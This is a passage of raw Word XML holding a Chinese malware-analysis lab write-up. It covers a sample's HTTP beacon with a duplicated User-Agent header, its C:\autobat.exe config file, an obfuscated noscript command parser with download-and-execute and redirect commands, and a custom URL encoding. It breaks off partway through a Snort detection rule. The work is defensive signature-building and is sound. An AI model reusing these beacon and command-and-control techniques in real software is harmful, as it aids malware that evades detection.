                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Accept:*/*\nAccept-Language: en-US\nUA-CPU: x86\nAccept-Encoding:gzip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>deflate"</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"User-Agent; Mozilla/4.0(compatible; MSIE 7.0; Windows NT 5.1;.NET CLR</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3.0.4506.2152;.NET CLR 3.5.30729)"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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这些字符串与第一个信令中的字符串一致。它们似乎相当普遍，但是元素的结合可能在实际中十分罕见。通过编写一个查找头部特定组合的特征，根据特征触发次数可以得到一个感觉，看哪些组合是特别罕见的。</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分析静态字符串，先比较这些字符串与原始的信令数据包。注意到信令中含有重复的User-Agent:User-Agent:字符串。虽然输出的字符串看起来是正确的，但是恶意代码编写者犯了一个错误，忘记了InternetopenA调用会包括头部的标题。这种情况可以创建一个有效的特征。</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sub_4011F3处的网络函数带有两个参数，其中仅有一个（lpszUrl）在InternetopenUr1A调用之前被使用了。这个参数定义了信令的目的地址URL。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4172585" cy="1427480"/>
            <wp:effectExtent l="0" t="0" r="3175" b="5080"/>
            <wp:docPr id="8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7"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId70"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4172585" cy="1427480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3834130" cy="2802890"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1270"/>
            <wp:docPr id="8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8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId71"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3834130" cy="2802890"/>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eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4253865" cy="841375"/>
            <wp:effectExtent l="0" t="0" r="13335" b="12065"/>
            <wp:docPr id="8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9"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4253865" cy="84137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父函数是WinMain,它包含一个带Sleep函数调用的主要循环。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3891280" cy="2865755"/>
            <wp:effectExtent l="0" t="0" r="10160" b="14605"/>
            <wp:docPr id="8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0"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId73"/>
                    <a:srcRect t="24" r="6903"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3891280" cy="2865755"/>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eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3845560" cy="2461895"/>
            <wp:effectExtent l="0" t="0" r="10160" b="6985"/>
            <wp:docPr id="8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1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId74"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3845560" cy="246189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在WinMain中向后跟踪URL参数，看到它是sub_401457处函数中被设置，而这一函数中包含了一个CreateFile调用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3949065" cy="1574800"/>
            <wp:effectExtent l="0" t="0" r="13335" b="10160"/>
            <wp:docPr id="8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2"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId75"/>
                    <a:srcRect r="6951"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3949065" cy="1574800"/>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eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3894455" cy="3435985"/>
            <wp:effectExtent l="0" t="0" r="6985" b="8255"/>
            <wp:docPr id="86"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3"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3894455" cy="343598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sub_401457</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>引用一组字符串，包含C:\\autobat.exe和http://www.practicalmalwareanalysis.com/start.htm。</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208780" cy="931545"/>
            <wp:effectExtent l="0" t="0" r="12700" b="13335"/>
            <wp:docPr id="8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4"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4208780" cy="93154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静态URL似乎是一个代表打开文件失败的分支，这意味着如果文件不存在，它将反馈到这个信令的URL。</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CreateFile函数调用使用了C:\\autobat.exe引用，ReadFile命令把缓冲作为一个参数，这个参数最终会返回到InternetOpenUrlA函数。推断autobat.exe是存储URL明文的配置文件。</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131310" cy="4137025"/>
            <wp:effectExtent l="0" t="0" r="13970" b="8255"/>
            <wp:docPr id="8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5"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId78"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4131310" cy="413702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0x004012C7处InternetReadFile调用后，看到另一个strstr调用，其中一个参数是&lt;no。</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006215" cy="1652270"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8890"/>
            <wp:docPr id="8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6"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId79"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4006215" cy="165227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strstr函数位于两个循环之间，外部的InternetReadFile调用获得更多数据，内部调用包含strstr函数和另外一个在查找&lt;no字符串时被调用的函数(sub_401000),可以推断这是一个测试能否找到正确内容的额外测试。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4058920" cy="2096770"/>
            <wp:effectExtent l="0" t="0" r="10160" b="6350"/>
            <wp:docPr id="9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7"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId80"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4058920" cy="2096770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4091305" cy="3355340"/>
            <wp:effectExtent l="0" t="0" r="8255" b="12700"/>
            <wp:docPr id="9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9"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId81"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4091305" cy="335534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攻击者通过将字符串比较拆分成多个小较短的字符串测试，来消除明显的字符串比较，从而尝试隐藏他们正在查找的字符串。请求的字符串(&lt;noscript&gt;)被混淆了，以避免产生明显的模式。图中前三个比较是0位置上的n，5位置上的i,以及1位置上的o。</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3884930" cy="3719830"/>
            <wp:effectExtent l="0" t="0" r="1270" b="13970"/>
            <wp:docPr id="9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0"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId82"/>
                    <a:srcRect l="9537" t="15" r="5784" b="19308"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3884930" cy="371983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然后按照单字节进行比较。第一个块是字符/的搜索，另一个是两个字符串的字符串比较(strstr),两个字符串都是作为参数被传入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>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其中一个参数是从互联网读取的字符串，另一个则是来自于配置文件中的URL。/字符在URL中向后搜索，一旦发现，字符/被转换成NULL,从而作为字符串的终止符。从本质上讲，这块代码是在返回缓冲区中搜索URL(除了文件名)。</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第二个块是从被截断URL尾部开始对静态字符串96'进行搜索。函数的底部有两条路径：一条表示查找所需的特征失败，另一条表示查找成功。大量的路径关注失败状态(1oc_401141),这些路径表示搜索提前终止。</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3079115" cy="3999865"/>
            <wp:effectExtent l="0" t="0" r="14605" b="8255"/>
            <wp:docPr id="9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2"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId83"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3079115" cy="399986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假设默认的URL正在被使用，这部分代码的过滤函数正在查找以下内容(noscript标签后的省略号表示可变的内容):</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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&lt;noscript</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>... http://www.practicalmalwareanalysis.comreturned_content96'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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回到WinMain，看到sub_401684紧跟着Internet函数(sub_4011F3),并且有一个相似的参数，这证明是一个URL。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4314825" cy="1702435"/>
            <wp:effectExtent l="0" t="0" r="13335" b="4445"/>
            <wp:docPr id="9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3"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId84"/>
                    <a:srcRect r="7350"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4314825" cy="170243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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sub_401684</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641215" cy="2266315"/>
            <wp:effectExtent l="0" t="0" r="6985" b="4445"/>
            <wp:docPr id="97"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4"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId85"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4641215" cy="2266315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>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sub_401684</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是一个选择函数，它配置为通过使用了跳转表的选择结构来做出选择。在选择结构之前，strtok将命令内容分为两部分，这两部分被存入两个变量。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>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511675" cy="3048000"/>
            <wp:effectExtent l="0" t="0" r="14605" b="0"/>
            <wp:docPr id="98"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5"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId86"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4511675" cy="3048000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>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下面的汇编拿出第一个字符串的第一个字符并且把这个字符用作选择语句(switch):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>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441190" cy="485140"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9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6"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId87"/>
                    <a:srcRect b="57930"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4441190" cy="48514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case 0是字符'd',所有其他case的值都大于10、14和15,它们被转换成'n','r'和's'。'n'函数是最早找到的，因为它除了设置一个导致主循环退出的变量外，什么也没有做。's'函数是休眠，它直接使用了命令的第二部分作为sleep命令的数字值。'r'和'd'函数是相关的，因为它们都在运行开始时将命令的第二部分传递一个相同函数。</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'd'函数调用了URLDownloadToCacheFileA和CreateProcessA,这与Lab 14-1中的代码十分相似。推断这是某种解码函数。</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r'函数也使用了编码函数，它接收输出并在sub_401372处的函数使用了它，其中引用了CreateFile、WriteFile以及先前提到相同的C:\\autobat.exe配置文件。推断'r'函数的目的是覆盖配置文件，将恶意代码重定向到不同的信令URL。</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890770" cy="2000885"/>
            <wp:effectExtent l="0" t="0" r="1270" b="10795"/>
            <wp:docPr id="10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7"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId88"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4890770" cy="200088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查看用于redirect和download功能的编码函数。一旦解码，内容被作为URL使用。</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查看sub_401147处的编码函数，注意循环。</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3644900" cy="3857625"/>
            <wp:effectExtent l="0" t="0" r="12700" b="13335"/>
            <wp:docPr id="10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8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId89"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3644900" cy="3857625"/>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循环开始是strlen调用，这意味着输入在这个地方被编码。检查循环的结尾，看到返回循环顶部之前，包含输出的变量(被函数末尾处它的存在确定)被加1,而源函数增加了2个。</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这个函数一次从源中取两个字符并将它们转成一个数字(使用atoi函数),然后使用这个数字作为下面字符串的索引：</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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/abcdefghijklmnopqrstuvwxyz0123456789:.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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虽然这个字符串看起来与Base64字符串几分相似，但是它没有大写字母，并且只有39个字符(一个URL完成可以只用小写字母表示)。用下图的编码对照表来编码恶意代码中默认的URL。</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3576955" cy="877570"/>
            <wp:effectExtent l="0" t="0" r="4445" b="6350"/>
            <wp:docPr id="102"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9"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId90">
                      <a:lum contrast="18000"/>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3576955" cy="87757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任何一个以http://开头的URL编码总是包含字符串08202016370000。</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现在用已经掌握的技术，来为这个恶意代码生成一个合适的特征集合。总的来说，有3种类型的通信的方法：信令包、嵌入在网页中的命令，以及下载和执行文件的请求。因为下载请求完全根据来自于攻击者数据并且为它生成一个特征会十分困难。</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信令包有着如下的结构：</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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>GET /start.htm HTTP/1.1</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Accept:*/*</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Accept-Language: en-US</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UA-CPU:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>86</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Accept-Encoding: gzip,deflate</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User-Agent: User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;</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,NET CUR 3.0.4506.2152;.NET CLR 3.5.30729)</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Host: ww</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>w</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.practicalmalwareanalysis.com</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Cache-Control: no-cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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www.practicalmalwareanalysis.com被定义为URL,它们可能是临时的(虽然在已知的情况下它们一定会被使用)。Accept:*/* Accept-Language: en-US UA-CPU:x86 Accept-Encoding: gzip,deflate User-Agent: User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;,NET CUR 3.0.4506.2152;.NET CLR 3.5.30729)是静态的，它们来自于代码中两个不同的字符串。</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因为攻击者犯了包含额外User-Agent:的错误，因此作为检测目标的明显特征是带有额外User-Agent头部的某些User-Agent字符串。</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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">alert tcp </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>HOME_NET any -&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
